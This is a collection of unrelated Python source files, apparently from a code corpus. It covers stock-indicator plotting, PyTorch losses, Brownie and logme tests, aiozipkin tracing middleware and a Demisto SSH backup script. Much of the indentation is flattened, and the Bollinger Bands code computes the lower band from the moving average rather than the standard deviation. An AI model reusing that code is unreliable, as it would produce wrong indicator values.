plt.xlabel("Time", color="red", fontsize=20)
plt.ylabel("Relative Strength Index (RSI)", color="r", fontsize=20)
plt.text(
data["date"][int(len(data) / 2)],
80,
">70 OverBought",
fontsize=20,
color="black",
)
plt.text(
data["date"][int(len(data) / 2)],
15,
"<30 OverSold",
fontsize=20,
color="black",
)
plt.legend()
plt.setp(ax2.xaxis.get_majorticklabels(), rotation=90)
ax2.tick_params(axis="x", colors="b")
ax2.tick_params(axis="y", colors="b")
ax2.axhline(y=70, color="r")
ax2.axhline(y=30, color="r")
plt.suptitle(
"Price and Relative Strength Index", color="red", fontsize=24
)
plt.savefig("rsi.png", bbox_inches="tight", facecolor="orange")
plt.show()
def get_bollinger_bands(
self,
days: Optional[int] = 20,
plot: Optional[bool] = False,
out_path: Optional[str] = "bollinger_bands.png",
) -> pd.DataFrame:
"""
Type:
Trend, volatility, momentum indicator
Computation:
They comprise three lines: A 20-day moving average, an upper
band and lower band—the upper and lower bands are plotted as
two standard deviations from the moving average.
What it signals:
The moving average shows the trend, the gap between
upper and lower band shows volatility in the counter.
References:
1. https://economictimes.indiatimes.com/
2. https://www.bollingerbands.com/bollinger-bands
        Args:
            days (int): Number of days for the moving average window
            plot (bool): Whether to plot the Bollinger Bands
            out_path (str): Save path for plot
Returns:
pd.DataFrame: A pandas DataFrame and save a plot to given path.
"""
data = self.df.copy()
data = data.sort_values(by=self.date_col).reset_index(drop=True)
data["SMA"] = data[self.price_col].rolling(days).mean()
data["SD"] = data[self.price_col].rolling(days).std()
data["BB_upper"] = data["SMA"] + data["SD"] * 2
data["BB_lower"] = data["SMA"] - data["SMA"] * 2
data.drop(["SD", "SMA"], axis=1, inplace=True)
data = data.sort_values(by=self.date_col, ascending=False).reset_index(
drop=True
)
        if plot:
fig, ax = plt.subplots(figsize=(16, 12))
plt.plot(data[self.date_col], data["BB_upper"], color="g")
plt.plot(data[self.date_col], data["BB_lower"], color="g")
plt.plot(data[self.date_col], data[self.price_col], color="orange")
plt.legend()
plt.xlabel("Time", color="b", fontsize=22)
plt.ylabel("Price", color="b", fontsize=22)
plt.title("Bollinger Bands", color="b", fontsize=27)
plt.tick_params(labelsize=17)
fig.set_facecolor("yellow")
plt.grid()
plt.savefig(
out_path, bbox_inches="tight", facecolor="orange",
)
plt.show()
return data
def get_moving_average_convergence_divergence(
self, plot: Optional[bool] = False, out_path: Optional[str] = "macd.png"
) -> pd.DataFrame:
"""
Type
Trend and momentum indicator
Computation
The difference between 12 and 26-day moving averages.
What it signals
Rising Moving Average Convergence Divergence (MACD) indicates an
upward price trend and falling MACD indicates a downward price trend.
Reference:
https://economictimes.indiatimes.com/
        Args:
            plot (bool): Whether to plot price and MACD
            out_path (str): Save path for plot
Returns:
pd.DataFrame: Pandas DataFrame with MACD values
"""
data = self.df.copy()
data["EMA_12"] = data[self.price_col].ewm(span=12, adjust=False).mean()
data["EMA_26"] = data[self.price_col].ewm(span=26, adjust=False).mean()
data["MACD"] = data["EMA_12"] - data["EMA_26"]
data.drop(["EMA_12", "EMA_26"], axis=1, inplace=True)
data = data.dropna()
        if plot:
fig, ax = plt.subplots(figsize=(14, 9))
plt.plot(
data[self.date_col],
data[self.price_col],
color="r",
label="Price",
)
plt.plot(data[self.date_col], data["MACD"], color="b", label="MACD")
plt.legend()
plt.title("Price and MACD Plot", fontsize=28, color="b")
plt.xlabel("Time", color="b", fontsize=19)
plt.ylabel("Price", color="b", fontsize=19)
plt.savefig(out_path, bbox_inches="tight", facecolor="orange")
fig.set_facecolor("orange")
plt.show()
return data
def get_simple_moving_average(
self,
days: Optional[int] = 15,
plot: Optional[bool] = False,
out_path: Optional[str] = "sma.png",
):
"""
        Simple moving average over the given number of days
        Args:
            days (int): Number of days to calculate the SMA over
            plot (bool): Whether to plot price and SMA
            out_path (str): Save path for plot
Returns:
pd.DataFrame: Pandas DataFrame with SMA values
"""
data = self.df.copy()
data = data.sort_values(by=self.date_col).reset_index(drop=True)
data["SMA"] = data[self.price_col].rolling(days).mean()
data = data.dropna()
data = data.sort_values(by=self.date_col, ascending=False).reset_index(
drop=True
)
        if plot:
fig, ax = plt.subplots(figsize=(14, 9))
plt.plot(
data[self.date_col],
data[self.price_col],
color="r",
label="Price",
)
plt.plot(data[self.date_col], data["SMA"], color="b", label="SMA")
plt.legend()
plt.title("Price and SMA Plot", fontsize=28, color="b")
plt.xlabel("Time", color="b", fontsize=19)
plt.ylabel("Price", color="b", fontsize=19)
plt.savefig(out_path, bbox_inches="tight", facecolor="orange")
fig.set_facecolor("orange")
plt.show()
return data
def get_exponential_moving_average(
self,
periods: List[int] = [20],
plot: Optional[bool] = False,
out_path: Optional[str] = "ema.png",
):
"""
The EMA is a moving average that places a greater weight and
significance on the most recent data points. Like all moving averages,
this technical indicator is used to produce buy and sell signals based
on crossovers and divergences from the historical average.
Traders often use several different EMA days, for instance, 20-day,
30-day, 90-day, and 200-day moving averages.
Reference:
https://www.investopedia.com/
        Args:
            periods (list): List of periods to calculate the EMA for
            plot (bool): Whether to plot price and EMA
            out_path (str): Save path for plot
Returns:
pd.DataFrame: Pandas DataFrame with EMA values
"""
data = self.df.copy()
for period in periods:
data["EMA_{}".format(period)] = (
data[self.price_col].ewm(span=period, adjust=False).mean()
)
        if plot:
fig, ax = plt.subplots(figsize=(14, 9))
plt.plot(
data[self.date_col],
data[self.price_col],
color="r",
label="Price",
)
for period in periods:
plt.plot(
data[self.date_col],
data["EMA_{}".format(period)],
label="EMA_{}".format(period),
)
plt.legend()
plt.title("Price and EMA Plot", fontsize=28, color="b")
plt.xlabel("Time", color="b", fontsize=19)
plt.ylabel("Price/EMA", color="b", fontsize=19)
plt.savefig(out_path, bbox_inches="tight", facecolor="orange")
fig.set_facecolor("orange")
plt.show()
return data
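# Illustrative usage (a sketch; column names follow this class's defaults):
#   dates = pd.date_range('2021-01-01', periods=60)
#   prices = 100 + np.cumsum(np.random.normal(0, 1, size=60))
#   ind = Indices(pd.DataFrame({'date': dates, 'price': prices}))
#   rsi_df = ind.get_rsi()
#   bb_df = ind.get_bollinger_bands(days=20)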
|
1697170
|
import torch
import torch.nn.functional as F
def to_tensor(x):
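    # Comparing the type name avoids importing numpy just for an isinstance check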
if type(x).__name__ == 'ndarray':
return torch.Tensor(x)
else:
return x
def clipwise_binary_crossentropy(output_dict, target_dict):
'''Weakly labelled loss. The output and target have shape of:
(batch_size, classes_num)
'''
return F.binary_cross_entropy(
output_dict['clipwise_output'], target_dict['weak_target'])
def framewise_binary_crossentropy(output_dict, target_dict):
'''Strongly labelled loss. The output and target have shape of:
(batch_size, frames_num, classes_num)
'''
output = output_dict['framewise_output']
target = target_dict['strong_target']
# To let output and target to have the same time steps
N = min(output.shape[1], target.shape[1])
return F.binary_cross_entropy(
output[:, 0 : N, :],
target[:, 0 : N, :])
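# Illustrative shapes (a sketch; dict keys follow the functions above, and the
# mismatched frame counts show the truncation to the shorter sequence):
#   output = {'clipwise_output': torch.rand(4, 10),
#             'framewise_output': torch.rand(4, 99, 10)}
#   target = {'weak_target': torch.randint(0, 2, (4, 10)).float(),
#             'strong_target': torch.randint(0, 2, (4, 100, 10)).float()}
#   loss = (clipwise_binary_crossentropy(output, target)
#           + framewise_binary_crossentropy(output, target))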
|
1697175
|
from collections import defaultdict
from ..config_new import ID_RESOLVING_APIS
from ..utils.common import getPrefixFromCurie, getValFromCurie
class CurieGroup:
def __init__(self, semanticType, curies):
self.semanticType = semanticType
self.curies = curies
@staticmethod
def _findAPI(semanticType):
return ID_RESOLVING_APIS.get(semanticType, {})
def groupCuriesByPrefix(self, curies: list):
grped = defaultdict(set)
for curie in curies:
prefix = getPrefixFromCurie(curie)
val = getValFromCurie(curie)
grped[prefix].add(val)
return grped
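# Illustrative grouping (a sketch, assuming CURIEs of the form 'prefix:value'
# and that the helpers above split on the colon):
#   grp = CurieGroup('Gene', ['NCBIGene:1017', 'NCBIGene:1018', 'HGNC:1771'])
#   grp.groupCuriesByPrefix(grp.curies)
#   # -> {'NCBIGene': {'1017', '1018'}, 'HGNC': {'1771'}}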
|
1697177
|
from torch.nn import Sequential, Conv2d, BatchNorm2d, ReLU
from ..utils import RichRepr
class Bottleneck(RichRepr, Sequential):
r"""
A 1x1 convolutional layer, followed by Batch Normalization and ReLU
"""
def __init__(self, in_channels: int, out_channels: int):
super(Bottleneck, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.add_module('conv', Conv2d(in_channels, out_channels, kernel_size=1, bias=False))
self.add_module('norm', BatchNorm2d(num_features=out_channels))
self.add_module('relu', ReLU(inplace=True))
def __repr__(self):
return super(Bottleneck, self).__repr__(self.in_channels, self.out_channels)
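# Illustrative use (a sketch): reduce channels ahead of a heavier stage.
#   import torch
#   x = torch.randn(2, 256, 14, 14)
#   Bottleneck(256, 64)(x).shape   # -> torch.Size([2, 64, 14, 14])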
|
1697211
|
import pytest
from brownie import network, AdvancedCollectible
def test_can_create_advanced_collectible(
get_account,
get_vrf_coordinator,
get_keyhash,
get_link_token,
chainlink_fee,
get_seed,
):
# Arrange
if network.show_active() not in ["development"] or "fork" in network.show_active():
pytest.skip("Only for local testing")
advanced_collectible = AdvancedCollectible.deploy(
get_vrf_coordinator.address,
get_link_token.address,
get_keyhash,
{"from": get_account},
)
get_link_token.transfer(
advanced_collectible.address, chainlink_fee * 3, {"from": get_account}
)
# Act
transaction_receipt = advanced_collectible.createCollectible(
"None", get_seed, {"from": get_account}
)
requestId = transaction_receipt.events["requestedCollectible"]["requestId"]
assert isinstance(transaction_receipt.txid, str)
get_vrf_coordinator.callBackWithRandomness(
requestId, 777, advanced_collectible.address, {"from": get_account}
)
# Assert
assert advanced_collectible.tokenCounter() > 0
assert isinstance(advanced_collectible.tokenCounter(), int)
|
1697233
|
import pickle
from blinker._utilities import symbol
def test_symbols():
foo = symbol('foo')
assert foo.name == 'foo'
assert foo is symbol('foo')
bar = symbol('bar')
assert foo is not bar
assert foo != bar
assert not foo == bar
assert repr(foo) == 'foo'
def test_pickled_symbols():
foo = symbol('foo')
for protocol in 0, 1, 2:
roundtrip = pickle.loads(pickle.dumps(foo))
assert roundtrip is foo
|
1697279
|
class Queue(object):
def __init__(self):
self.__values = []
def enqueue(self, v):
self.__values.insert(0, v)
def dequeue(self):
if len(self.__values) == 0:
return None
else:
return self.__values.pop()
def len(self):
return len(self.__values)
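# Note: list.insert(0, v) is O(n) per enqueue; collections.deque would give
# O(1) operations at both ends. Illustrative FIFO behaviour:
#   q = Queue()
#   q.enqueue('a'); q.enqueue('b')
#   q.dequeue()   # -> 'a'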
|
1697282
|
from ._operation import RingQK, RingAV
from .layers import TransformerSelfAttentionRing
__all__ = ['TransformerSelfAttentionRing', 'RingAV', 'RingQK']
|
1697339
|
import abc
import enum
from typing import Any, Dict, List, Tuple, Union
import numpy as np
import pandas as pd
Record = Dict[str, Any]
Records = List[Record]
InputRecords = Union[Records, pd.DataFrame]
DataRecord = Tuple[Dict[str, Union[np.ndarray, float]], ...]
BatchDataRecords = Tuple[Dict[str, np.ndarray], ...]
RecordScore = Dict[str, np.ndarray]
BatchRecordScores = List[RecordScore]
class RecordMode(enum.Enum):
TRAIN = 0
VALIDATION = 1
SCORE = 2
class RecordLoader(abc.ABC):
"""Class for loading records into DataRecord.
Args:
mode: RecordMode, load mode.
"""
def __init__(self, mode: RecordMode, **params):
self.mode = mode
def __call__(self, record: Record) -> DataRecord:
return self.load(record)
@abc.abstractmethod
def load(self, record: Record) -> DataRecord: # pragma: no cover
"""Method for loading a record into DataRecord.
Args:
record: Record, record.
Returns:
DataRecord, data record.
"""
raise NotImplementedError()
class RecordTransformer(abc.ABC):
"""Class that computes a transform on training data records & applys
transform to validation and scoring data records (network input), ability
to pass computed network params to the network builder, and
ability to apply inverse transforms on record scores (network output).
Args:
mode: RecordMode, transform mode.
loader: RecordLoader, record loader.
"""
def __init__(self, mode: RecordMode, loader: RecordLoader, **params):
self.mode = mode
self.loader = loader
self._network_params = {} # type: dict
@abc.abstractmethod
def fit(self, records: Records): # pragma: no cover
"""Fit transform to records.
Args:
records: Records, records.
"""
raise NotImplementedError()
@abc.abstractmethod
def transform(self, data_record: DataRecord) -> DataRecord: # pragma: no cover
"""Apply transform to a data record.
Args:
data_record: DataRecord, data record.
Returns:
DataRecord, data record.
"""
raise NotImplementedError()
@abc.abstractmethod
def postprocess(self, score: RecordScore) -> RecordScore: # pragma: no cover
"""Postprocess score to undo transform.
Args:
score: RecordScore, record output from net.
Returns:
RecordScore, postprocessed record output from net.
"""
raise NotImplementedError()
@abc.abstractmethod
def load(self, path: str): # pragma: no cover
"""Load transformer.
Args:
path: str.
"""
raise NotImplementedError()
@abc.abstractmethod
def save(self, path: str): # pragma: no cover
"""Save transformer.
Args:
path: str.
"""
raise NotImplementedError()
@property
def network_params(self) -> dict:
"""Special params passed to the network builder."""
return self._network_params
@network_params.setter
def network_params(self, x):
if not isinstance(x, dict):
raise TypeError("network_params must be a dict")
self._network_params = x
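# Minimal illustrative subclass (a sketch, not part of the library): loads one
# named float feature, plus a target except in SCORE mode.
class _ExampleLoader(RecordLoader):
    def load(self, record: Record) -> DataRecord:
        features = {"x": np.asarray(record["x"], dtype="float32")}
        if self.mode == RecordMode.SCORE:
            return (features,)
        targets = {"y": np.asarray(record["y"], dtype="float32")}
        return features, targets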
|
1697395
|
SECRET_KEY = 'tests'
INSTALLED_APPS = [
"drynk",
"drynk.tests",
]
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'drynk.sqlite3',
}
}
|
1697402
|
import json
import functools
IOS_OSS_APPS_DATASET = "../oss_ios_apps/contents_july_2018.json"
@functools.lru_cache()
def get_project(gh_user, gh_project):
"""Ola."""
project_name = f"{gh_user}/{gh_project}"
datastore = _read_app_dataset()
projects = datastore['projects']
return next(
(project
for project in projects
if project_name in project['source']),
None
)
@functools.lru_cache()
def get_itunes_id(gh_user, gh_project):
    project = get_project(gh_user, gh_project)
    if project is None:
        return None
    itunes_url = project.get('itunes')
    if itunes_url:
        return itunes_url.split('/id')[-1]
    return None
@functools.lru_cache()
def _read_app_dataset():
"""Parse json object with app informatino."""
with open(IOS_OSS_APPS_DATASET, 'r') as input_file:
datastore = json.load(input_file)
return datastore
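# Illustrative lookup (a sketch; the user/project names are hypothetical and
# results depend on the bundled JSON dataset being present):
#   get_itunes_id('someuser', 'SomeApp')   # -> id string, or None if unlisted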
|
1697470
|
import struct
from typing import Optional
from bxgateway import ont_constants
from bxgateway.messages.ont.ont_message import OntMessage
from bxgateway.messages.ont.ont_message_type import OntMessageType
class VerAckOntMessage(OntMessage):
MESSAGE_TYPE = OntMessageType.VERACK
def __init__(self, magic: Optional[int] = None, is_consensus: Optional[bool] = None,
buf: Optional[bytearray] = None):
if buf is None:
buf = bytearray(ont_constants.ONT_HDR_COMMON_OFF + ont_constants.ONT_CHAR_LEN)
self.buf = buf
off = ont_constants.ONT_HDR_COMMON_OFF
struct.pack_into("<?", buf, off, is_consensus)
off += ont_constants.ONT_CHAR_LEN
super().__init__(magic, self.MESSAGE_TYPE, off - ont_constants.ONT_HDR_COMMON_OFF, buf)
else:
self.buf = buf
self._memoryview = memoryview(buf)
self._magic = self._command = self._payload_len = self._checksum = None
self._payload = None
self._is_consensus = None
def is_consensus(self) -> bool:
if self._is_consensus is None:
off = ont_constants.ONT_HDR_COMMON_OFF
self._is_consensus, = struct.unpack_from("<?", self.buf, off)
is_consensus = self._is_consensus
assert isinstance(is_consensus, bool)
return is_consensus
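# Construction sketch (hedged; the magic number below is a placeholder --
# real values come from the Ontology network configuration):
#
#   msg = VerAckOntMessage(magic=0x12345678, is_consensus=False)
#   assert msg.is_consensus() is False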
|
1697486
|
import pytest
import shutil
from pathlib import Path
from click.testing import CliRunner
from bnmutils import ConfigParser
from bnmutils.novelty import cd
from logme.exceptions import LogmeError
from logme.utils import get_logger_config
from logme import __version__
from logme import cli
class TestCli:
@classmethod
def setup_class(cls):
cls.runner = CliRunner()
def test_version(self):
result = self.runner.invoke(cli, ['-v'])
assert f"version {__version__}" in result.output
# ---------------------------------------------------------------------------
# 'logme init' test
# ---------------------------------------------------------------------------
@pytest.mark.parametrize('file_path, cmd_args',
[pytest.param('logme.ini', ['init'],
id='init from root dir'),
pytest.param('dir2/logme.ini', ['init', '-p', 'dir2', '-mk'],
id='init with an additional dir -relative path')])
def test_init(self, tmpdir, file_path, cmd_args):
expected_file = Path(tmpdir.join(file_path))
with cd(tmpdir):
result = self.runner.invoke(cli, cmd_args)
assert result.exit_code == 0
assert expected_file.is_file()
conf = ConfigParser.from_files(expected_file)
assert conf.sections() == ['colors', 'logme']
# Assert the first section is the color config
with open(expected_file) as file:
line = file.readline()
assert line == '[colors]\n'
def test_init_absolute_root_path(self, tmpdir):
root_path = Path(tmpdir.join('dir_abs'))
with cd(tmpdir):
result = self.runner.invoke(cli, ['init', '-p', str(root_path), '-mk'])
assert result.exit_code == 0
assert (root_path / 'logme.ini').is_file()
@pytest.mark.parametrize('option, key, expected',
[pytest.param(['-lvl', 'INFO'], ['logme', 'level'], 'INFO',
id='with custom level'),
pytest.param(['-lvl', 'error'], ['logme', 'level'], 'ERROR',
id='with custom level as lower case string'),
pytest.param(['-lvl', '50'], ['logme', 'level'], '50',
id='with custom level as integer'),
pytest.param(['-f', '{name} : {message}'], ['logme', 'formatter'],
'{name} : {message}',
id='with custom formatter'),
])
def test_init_file_change(self, tmpdir, option, key, expected):
self.runner.invoke(cli, ['init', '-p', tmpdir] + option)
conf = ConfigParser.from_files(tmpdir.join('logme.ini'))
assert conf.get(*key) == expected
def test_init_chained_options(self, tmpdir):
tmp = tmpdir.join('my_project')
self.runner.invoke(cli, ['init', '-p', tmp,
'-mk', '-lp', tmp.join('var/log/dummy.log')])
config = ConfigParser.from_files(tmp.join('logme.ini'))
fh_conf = config.to_dict(section='logme', option='file')
assert fh_conf['filename'] == tmp.join('var/log/dummy.log')
assert set(fh_conf.keys()) == {'active', 'level', 'filename', 'type'}
def test_init_raise_invalid_dir(self, tmpdir):
with cd(tmpdir):
result = self.runner.invoke(cli, ['init', '-p', 'blah'])
with pytest.raises(NotADirectoryError) as e_info:
raise result.exception
assert e_info.value.args[0] == f"{tmpdir.join('blah')} does not exist. If you'd " \
f"like to make the directory, please use '-mk' flag."
def test_init_raise_conf_exists(self, tmpdir):
with cd(tmpdir):
self.runner.invoke(cli, ['init'])
logme_path = Path(tmpdir) / 'logme.ini'
assert logme_path.exists()
result = self.runner.invoke(cli, ['init'])
with pytest.raises(LogmeError) as e_info:
raise result.exception
assert e_info.value.args[0] == f"logme.ini already exists at {logme_path}"
def test_init_override(self, tmpdir):
with cd(tmpdir):
# Before override
self.runner.invoke(cli, ['init', '-lvl', 'error'])
logme_path = Path(tmpdir) / 'logme.ini'
conf_content_before = get_logger_config(logme_path)
assert conf_content_before['level'] == 'ERROR'
self.runner.invoke(cli, ['init', '-o'])
conf_content_after = get_logger_config(logme_path)
assert conf_content_after['level'] == 'DEBUG'
# ---------------------------------------------------------------------------
# 'logme add' test
# ---------------------------------------------------------------------------
def test_add_command(self, tmpdir):
with cd(tmpdir):
self.runner.invoke(cli, ['init'])
result = self.runner.invoke(cli, ['add', 'blah'])
config_path = tmpdir.join('logme.ini')
config = ConfigParser.from_files(config_path)
assert result.exit_code == 0
assert Path(config_path).is_file()
assert set(config.sections()) == {'colors', 'logme', 'blah'}
def test_add_command_no_file(self, tmpdir):
with cd(tmpdir):
with pytest.raises(FileNotFoundError):
result = self.runner.invoke(cli, ['add', 'blah'])
raise result.exception
# ---------------------------------------------------------------------------
# 'logme remove' test
# ---------------------------------------------------------------------------
def test_remove_command(self, tmpdir):
with cd(tmpdir):
self.runner.invoke(cli, ['init'])
self.runner.invoke(cli, ['add', 'test'])
config_path = tmpdir.join('logme.ini')
config_before = ConfigParser.from_files(config_path)
assert set(config_before.sections()) == {'colors', 'logme', 'test'}
result = self.runner.invoke(cli, ['remove', 'test'])
config_after = ConfigParser.from_files(config_path)
assert result.exit_code == 0
assert config_after.sections() == ['colors', 'logme']
@pytest.mark.parametrize('conf_name, message',
[
pytest.param('logme', "'logme' master configuration cannot be removed!",
id='when trying to remove logme master config'),
pytest.param('colors', "'colors' configuration cannot be removed! To remove "
"color logging, set all color values to 'None'",
id='when trying to remove color config')
])
def test_remove_raise(self, tmpdir, conf_name, message):
with cd(tmpdir):
self.runner.invoke(cli, ['init'])
with pytest.raises(LogmeError) as e_info:
result = self.runner.invoke(cli, ['remove', conf_name])
raise result.exception
assert e_info.value.args[0] == message
# ---------------------------------------------------------------------------
# 'logme upgrade' test
# ---------------------------------------------------------------------------
def test_upgrade_command(self, tmpdir):
local_logme_file = Path(__file__).parent / 'logme.ini'
tmpdir_file = tmpdir.join('logme.ini')
shutil.copyfile(local_logme_file, tmpdir_file)
with cd(tmpdir):
result = self.runner.invoke(cli, ['upgrade'])
assert result.output.strip() == f"{tmpdir_file} has been updated to {__version__}"
|
1697488
|
from .base import *
import dj_database_url
ALLOWED_HOSTS = ['.herokuapp.com']
DEBUG = False
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
# override database settings
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
|
1697563
|
import ipaddress
import sys
from contextlib import contextmanager
from types import SimpleNamespace
from typing import (
Any,
Awaitable,
Callable,
Dict,
Generator,
Iterable,
Optional,
Set,
cast,
)
import aiohttp
from aiohttp import (
TraceRequestEndParams,
TraceRequestExceptionParams,
TraceRequestStartParams,
)
from aiohttp.web import (
AbstractRoute,
Application,
HTTPException,
Request,
StreamResponse,
middleware,
)
from .constants import HTTP_METHOD, HTTP_PATH, HTTP_ROUTE, HTTP_STATUS_CODE
from .helpers import (
CLIENT,
SERVER,
TraceContext,
make_context,
parse_debug_header,
parse_sampled_header,
)
from .span import SpanAbc
from .tracer import Tracer
APP_AIOZIPKIN_KEY = "aiozipkin_tracer"
REQUEST_AIOZIPKIN_KEY = "aiozipkin_span"
__all__ = (
"setup",
"get_tracer",
"request_span",
"middleware_maker",
"make_trace_config",
"APP_AIOZIPKIN_KEY",
"REQUEST_AIOZIPKIN_KEY",
)
Handler = Callable[[Request], Awaitable[StreamResponse]]
Middleware = Callable[[Request, Handler], Awaitable[StreamResponse]]
def _set_remote_endpoint(span: SpanAbc, request: Request) -> None:
peername = request.remote
if peername is not None:
kwargs: Dict[str, Any] = {}
try:
peer_ipaddress = ipaddress.ip_address(peername)
except ValueError:
pass
else:
if isinstance(peer_ipaddress, ipaddress.IPv4Address):
kwargs["ipv4"] = str(peer_ipaddress)
else:
kwargs["ipv6"] = str(peer_ipaddress)
if kwargs:
span.remote_endpoint(None, **kwargs)
def _get_span(request: Request, tracer: Tracer) -> SpanAbc:
# builds span from incoming request, if no context found, create
# new span
context = make_context(request.headers)
if context is None:
sampled = parse_sampled_header(request.headers)
debug = parse_debug_header(request.headers)
span = tracer.new_trace(sampled=sampled, debug=debug)
else:
span = tracer.join_span(context)
return span
def _set_span_properties(span: SpanAbc, request: Request) -> None:
span_name = f"{request.method.upper()} {request.path}"
span.name(span_name)
span.kind(SERVER)
span.tag(HTTP_PATH, request.path)
span.tag(HTTP_METHOD, request.method.upper())
resource = request.match_info.route.resource
if resource is not None:
route = resource.canonical
span.tag(HTTP_ROUTE, route)
_set_remote_endpoint(span, request)
PY37 = sys.version_info >= (3, 7)
if PY37:
from contextvars import ContextVar
OptTraceVar = ContextVar[Optional[TraceContext]]
zipkin_context: OptTraceVar = ContextVar("zipkin_context", default=None)
@contextmanager
def set_context_value(
context_var: OptTraceVar, value: TraceContext
) -> Generator[OptTraceVar, None, None]:
token = context_var.set(value)
try:
yield context_var
finally:
context_var.reset(token)
def middleware_maker(
skip_routes: Optional[Iterable[AbstractRoute]] = None,
tracer_key: str = APP_AIOZIPKIN_KEY,
request_key: str = REQUEST_AIOZIPKIN_KEY,
) -> Middleware:
s = skip_routes
skip_routes_set: Set[AbstractRoute] = set(s) if s else set()
@middleware
async def aiozipkin_middleware(
request: Request, handler: Handler
) -> StreamResponse:
# route is in skip list, we do not track anything with zipkin
if request.match_info.route in skip_routes_set:
resp = await handler(request)
return resp
tracer = request.app[tracer_key]
span = _get_span(request, tracer)
request[request_key] = span
if span.is_noop:
resp = await handler(request)
return resp
if PY37:
with set_context_value(zipkin_context, span.context):
with span:
_set_span_properties(span, request)
try:
resp = await handler(request)
except HTTPException as e:
span.tag(HTTP_STATUS_CODE, str(e.status))
raise
span.tag(HTTP_STATUS_CODE, str(resp.status))
else:
with span:
_set_span_properties(span, request)
try:
resp = await handler(request)
except HTTPException as e:
span.tag(HTTP_STATUS_CODE, str(e.status))
raise
span.tag(HTTP_STATUS_CODE, str(resp.status))
return resp
return aiozipkin_middleware
def setup(
app: Application,
tracer: Tracer,
*,
skip_routes: Optional[Iterable[AbstractRoute]] = None,
tracer_key: str = APP_AIOZIPKIN_KEY,
request_key: str = REQUEST_AIOZIPKIN_KEY,
) -> Application:
"""Sets required parameters in aiohttp applications for aiozipkin.
Tracer added into application context and cleaned after application
shutdown. You can provide custom tracer_key, if default name is not
suitable.
"""
app[tracer_key] = tracer
m = middleware_maker(
skip_routes=skip_routes, tracer_key=tracer_key, request_key=request_key
)
app.middlewares.append(m)
# register cleanup signal to close zipkin transport connections
async def close_aiozipkin(app: Application) -> None:
await app[tracer_key].close()
app.on_cleanup.append(close_aiozipkin)
return app
def get_tracer(app: Application, tracer_key: str = APP_AIOZIPKIN_KEY) -> Tracer:
"""Returns tracer object from application context.
By default tracer has APP_AIOZIPKIN_KEY in aiohttp application context,
you can provide own key, if for some reason default one is not suitable.
"""
return cast(Tracer, app[tracer_key])
def request_span(request: Request, request_key: str = REQUEST_AIOZIPKIN_KEY) -> SpanAbc:
"""Returns span created by middleware from request context, you can use it
as parent on next child span.
"""
return cast(SpanAbc, request[request_key])
class ZipkinClientSignals:
"""Class contains signal handler for aiohttp client. Handlers executed
only if aiohttp session contains tracer context with span.
"""
def __init__(self, tracer: Tracer) -> None:
self._tracer = tracer
def _get_span_context(
self, trace_config_ctx: SimpleNamespace
) -> Optional[TraceContext]:
ctx = self._get_span_context_from_dict(
trace_config_ctx
) or self._get_span_context_from_namespace(trace_config_ctx)
if ctx:
return ctx
if PY37:
has_implicit_context = zipkin_context.get() is not None
if has_implicit_context:
return zipkin_context.get()
return None
def _get_span_context_from_dict(
self, trace_config_ctx: SimpleNamespace
) -> Optional[TraceContext]:
ctx = trace_config_ctx.trace_request_ctx
if isinstance(ctx, dict):
r: Optional[TraceContext] = ctx.get("span_context")
return r
return None
def _get_span_context_from_namespace(
self, trace_config_ctx: SimpleNamespace
) -> Optional[TraceContext]:
ctx = trace_config_ctx.trace_request_ctx
if isinstance(ctx, SimpleNamespace):
r: Optional[TraceContext] = getattr(ctx, "span_context", None)
return r
return None
async def on_request_start(
self,
session: aiohttp.ClientSession,
context: SimpleNamespace,
params: TraceRequestStartParams,
) -> None:
span_context = self._get_span_context(context)
if span_context is None:
return
p = params
span = self._tracer.new_child(span_context)
context._span = span
span.start()
span_name = f"client {p.method.upper()} {p.url.path}"
span.name(span_name)
span.kind(CLIENT)
ctx = context.trace_request_ctx
propagate_headers = True
if isinstance(ctx, dict):
# Check ctx is dict to be compatible with old package versions
propagate_headers = ctx.get("propagate_headers", True)
if isinstance(ctx, SimpleNamespace):
propagate_headers = getattr(ctx, "propagate_headers", True)
if propagate_headers:
span_headers = span.context.make_headers()
p.headers.update(span_headers)
async def on_request_end(
self,
session: aiohttp.ClientSession,
context: SimpleNamespace,
params: TraceRequestEndParams,
) -> None:
span_context = self._get_span_context(context)
if span_context is None:
return
span = context._span
span.finish()
delattr(context, "_span")
async def on_request_exception(
self,
session: aiohttp.ClientSession,
context: SimpleNamespace,
params: TraceRequestExceptionParams,
) -> None:
span_context = self._get_span_context(context)
if span_context is None:
return
span = context._span
span.finish(exception=params.exception)
delattr(context, "_span")
def make_trace_config(tracer: Tracer) -> aiohttp.TraceConfig:
"""Creates aiohttp.TraceConfig with enabled aiozipking instrumentation
for aiohttp client.
"""
trace_config = aiohttp.TraceConfig()
zipkin = ZipkinClientSignals(tracer)
trace_config.on_request_start.append(zipkin.on_request_start)
trace_config.on_request_end.append(zipkin.on_request_end)
trace_config.on_request_exception.append(zipkin.on_request_exception)
return trace_config
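# Wiring sketch (hedged; tracer creation happens outside this module, e.g.
# via aiozipkin.create(), and a ready tracer is assumed here):
#
#   app = Application()
#   setup(app, tracer)
#   # for outgoing requests, attach client instrumentation to the session:
#   session = aiohttp.ClientSession(trace_configs=[make_trace_config(tracer)])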
|
1697576
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
CLI_ADD = "add backup local"
BASH_ADD = '/etc/cli.sh -c "' + CLI_ADD + '"'
def main():
res = []
tbl = []
devices = demisto.get(demisto.args(), 'devices')
devicesBackupStarted = []
devicesBackupError = []
if not devices:
res.append(
{"Type": entryTypes["error"], "ContentsFormat": formats["text"], "Contents": "Received empty device list!"})
else:
devices = ','.join(devices) if isinstance(devices, list) else devices
sshArgs = {"using": devices,
"cmd": BASH_ADD
}
resSSH = demisto.executeCommand("ssh", sshArgs)
try:
for entry in resSSH:
if isError(entry) and not demisto.get(entry, 'Contents.command'):
res += resSSH
break
else:
device = entry['ModuleName']
if demisto.get(entry, 'Contents.success'):
output = demisto.get(entry, 'Contents.output')
backFileLoc = output.find("Backup file location")
result = 'Answer returned'
devicesBackupStarted.append({
'DeviceName': device,
'System': demisto.get(entry, 'Contents.system'),
'Status': ("Done" if output.find("local backup succeeded.") > -1 else "Pending"),
                            'Path': (output[backFileLoc:] if backFileLoc > -1 else None)
})
else:
devicesBackupError.append(device)
